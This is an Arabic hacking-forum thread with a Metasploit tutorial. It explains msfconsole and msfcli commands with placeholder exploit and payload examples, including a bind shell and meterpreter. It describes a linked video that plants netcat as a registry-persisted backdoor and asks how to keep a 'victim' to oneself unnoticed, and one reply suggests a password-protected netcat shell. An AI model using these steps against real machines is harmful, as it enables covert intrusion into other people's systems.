نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 19/04/2010, 17:26   المشاركة رقم: 1
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:
الصورة الرمزية
 
الصورة الرمزية ViRuS_Ra3cH

البيانات
التسجيل : Mar 2010
العضوية : 2
الاهتمامات : DZ
الإقامة : DZ
المواضيع : 466
الردود : 629
المجموع : 1,095
بمعدل : 0.19 يوميا
الاختراقات : [ra3ch]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 02/01/2018/12:49
سبب الغياب : معكم ألي أخر ضربه أدا كتب ربي..
معدل التقييم: 10
نقاط التقييم: 18
ViRuS_Ra3cH is on a distinguished road
شكراً: 493
تم شكره 194 مرة في 101 مشاركة

 Algeria


الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

افتراضي الدرس الخامس : التعامل مع الميتاسبلويت



السلام عليكم ورحمه الله

اليوم درسنا راح يتكلم عن كيفيه التعامل مع واجهات الميتاسبلويت

وهي

1- msfconsole
msfcli -2
msfgui -3
msfw eb -4

msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر

الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها .


msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى

msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه

وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack


msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه

ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل


msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا


راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات .


1- msfconsole

راح اشرح الاوامر المهمه

1- show

الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all


مثال :
show exploits
عرض الثغرات

show payloads
عرض payloads

show encoders

عرض encoders

show nops

عرض nops

show auxiliary

عرض auxiliary

show options

عرض الخيارات

2- use

بمعنى استخدم الثغره او auxiliary
كود:
use exploit/windows/smb/msdns_zone****
كود:
use auxiliary/scanner/smb/version
البعض يتسائل كيف احفظ اسم الثغره كامل ؟

ما يحتاج كل الي عليك كتابه use ex ومن ثم اضغط زر Tab على الكيبورد وراح يكمل كل شيء

3- info

عرض معلومات الثغره

مثال :
كود:
info exploit/windows/smb/msdns_zone****
كود:
use exploit/windows/smb/msdns_zone****
ثم
info

set -4

بمعنى ضع للمتغير قيمه

مثال

set rhost 192.168.1.3
set payload windows/shell_bind_tcp

connect -5

مثل اداه النت كات

exploit and run -6

exploit تستخدم لتشغيل الثغرات

run يستخدم لتشغيل auxiliary


back -7

العوده للوراء

مثال :

كود:
msf exploit(msdns_zone****) > back
msf >
بقيه الاوامر راح تكتشفها مع الاستخدام بأذن الله


نروح لطريقه استخدام الثغره

استخدامها سهل ما تتعدا خمس اوامر

كود:
اسم الثغره use

show option 

ليتم عرض المتغيرات 

اسم المتغير set

exploit
بعض الخيارات المخفيه حين اختيار الثغره .

show advanced
show evasion

ما انصح بتغيير خياراتهم الا اذا كنت فاهم المطلوب لان من كل ثغره لثغره تختلف , وبعض المرات

الثغره ما تشتغل الا بعد تعديل بعض الخيارات طبعا هذا بناء على جهاز ضحيتك ,

show targets

عرض الاهداف التي تشتغل الثغره عليها


نروح للاداه الاخرى msfcli

نروح لكيفيه الاستخدام

استخدامها سهل جدا وعن طريق سطر واحد

كود:
Usage: ./msfcli   [mode]
====================================================

    Mode           Description
    ----           -----------
    (H)elp         Youre looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
S = ملعومات الثغره

O = خيارات الثغره

ِE = تشغيل الثغره

P = عرض بايلود الخاصه

مثال لاستغلال ثغره

كود:
./msfcli exploit/windows/***  payload=windows/meterpreter/** rhost=A.B.C.D lhost=1.1.1.1
بدال ما نكتب داخل msfconsole

كود:
set rhost a.b.c.d

set payload windows/****
نضع
rhost=
payload=

هذا الشرح كمختصر بأمكانك التطبيق


انا عندي تطبيق قديم اسمه hacking the ip first guide مسويه قبل سنه

كانت عندي سلسله لكن طارت

تابع التطبيق , ومن ثم يأتي وقت السؤال

ملاحظه : اهم شيء التطبيق للثغره

كود PHP:
http://www.youtube.com/watch?v=vF3ZwD0vssk&feature=player_embedded 

بعد ما تابعنا الفديو جاء وقت السؤال لكن هذا السؤال لتشغيل المخ , وممكن تصير اكثر من اجابه صح

في الفديو وضعنا النت كات كباك دور ومن ثم سجلناه بالريجستري عشان كل مره يشغل الجهاز يتصل على اي بي المهاجم

انا الان بشبكه داخليه وتعرفون ان الشبكه الداخليه ممكن يتغير اي بي بتاعك حين تفصل الاتصال من المودم
ا
او بأي طريق اخرى , طيب حين تفصل ممكن واحد يأخذ اي بي بتاعك , بكل تأكيد راح يطير الضحيه

انا ما ابي اثبت الاي بي بتاعي داخل الشبكه , لذلك نحتاج اتصال مباشر بمعنى اخر انا اللي اتصل بالضحيه مش الضحيه اللي يبي يتصل بي

لكن المشكله ان اي شخص غيري يقدر يتصل بعد لان اتصال مباشر

كيف اخلي الضحيه خاص بي بمعنى اخر انا اللي ابغى اتصل لوحدي ولا ابي احد يتصل معي

وايضا ما ابي اخلي الضحيه يشك

انا ابغى ناس تفكر مش تفتح القوقل وتبحث :-)

SiLv3r00t

V4-team.com



آخر مواضيع » ViRuS_Ra3cH

توقيع : ViRuS_Ra3cH

IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====

===

عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
قديم 12/07/2010, 07:43   المشاركة رقم: 2
المعلومات
الكاتب:
  WOLF_DZ  
اللقب:
.: نائب المدير :.

الإتصالات
الحالة:
WOLF_DZ غير متواجد حالياً
وسائل الإتصال:

كل الشكر لك اخي رعش
بارك الله بيك
تحيتي لك

عرض البوم صور WOLF_DZ   رد مع اقتباس
قديم 20/07/2010, 09:02   المشاركة رقم: 3
المعلومات
الكاتب:
 aloner  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
aloner غير متواجد حالياً
وسائل الإتصال:

مشكور على الموضوع جاري متابعة الدورة

عرض البوم صور aloner   رد مع اقتباس
قديم 25/07/2010, 08:38   المشاركة رقم: 4
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:


مبدع اخي رعش

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
قديم 07/08/2010, 13:29   المشاركة رقم: 5
المعلومات
الكاتب:
 shapola  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
shapola غير متواجد حالياً
وسائل الإتصال:

****ااااااااااااااااا يا اخى

عرض البوم صور shapola   رد مع اقتباس
قديم 07/08/2010, 22:12   المشاركة رقم: 6
المعلومات
الكاتب:
 سردينة2009  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
سردينة2009 غير متواجد حالياً
وسائل الإتصال:

**** اخي على هل در س

عرض البوم صور سردينة2009   رد مع اقتباس
قديم 12/01/2011, 23:10   المشاركة رقم: 7
المعلومات
الكاتب:
 doubleali  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
doubleali غير متواجد حالياً
وسائل الإتصال:

السلام عليكم

**** للافاده التي اتحفتنا فيها

اعتقد لتثبيت الاي بي
نستخدم No-ip مثلا
اما لجعل الشل لك وحدك نستحدم باسورد للدخول للنت كات - لا اعلم ان كانت نت كات تدعم هذه الخاصيه اثناء بحثي في الجوجل رايت محاولات لتعديل سورس النت كات لجعله يطلب باسورد ربما هذه هي الطريقه ؟
انتظر الاجابه بفارغ الصبر منك !

عرض البوم صور doubleali   رد مع اقتباس
قديم 08/01/2014, 14:29   المشاركة رقم: 8
المعلومات
الكاتب:
 loock  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
loock غير متواجد حالياً
وسائل الإتصال:

جزاكم الله خيرا

عرض البوم صور loock   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 66
00X , 3bjo , adiesmadi , airami , AKBIROCK3 , aloner , amr.elbomb , amrhakers , Anis Gladiator , aqm , aza , A£K93 , مدمراليهود , العدامه22 , dawaima , doubleali , DR.X , dzori , elmojahid , ExPLo!T_Dz , fire_jooh , hacoo0 , hak4 , hamza 12 , حازومانى , حكمي , john23 , khalil19000 , lasbat-dz , loock , luop1980 , M3GO , maaahs , MAFIA-DZ , MdMn HaCk3r , med-hackerdz , midofahmey , mimoon , mividalocka , mo3eth , Mr-didi , Mr.3Jr4M , Nassim0x09 , okita0039 , سجين الوطن , سردينة2009 , raouf74 , RaYm0n , S-japonia33 , S1LV3rS3rf3r , SaBeR-Dz , Saif Al-Naar , saudi_hack , shadid , shapola , sisou-5 , snaiper-code , system.dz , totti , ViRuS_Ra3cH , Vladimir , wajditounsi , WOLF_DZ , فارس , zrx , §الـقہاتہلٌ الـمہـحـتہرف§

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
الدرس الثالث: ادوات الميتاسبلويت ViRuS_Ra3cH دورة الميتاسبلويت | SiLv3r00t 6 30/01/2015 22:30
الدرس الثامن : الدخول لعالم الميتاسبلويت ! ViRuS_Ra3cH دورة الميتاسبلويت | SiLv3r00t 6 08/01/2014 14:33
الدرس الخامس - التقسيم وحصر القيم أحمد العرجان دورة التــــشـــفـــــير 7 08/12/2012 20:30
الدرس الثاني: شرح الميتاسبلويت وملفاته ViRuS_Ra3cH دورة الميتاسبلويت | SiLv3r00t 6 13/02/2011 21:30
الدرس الخامس (دينامكية عمل ثغرة Remote Upload Vulnerability) ViRuS_Ra3cH دورة تخطي الحماية للسيرفرات | Crazy_Hacker 0 18/03/2010 01:48

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 18:52.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115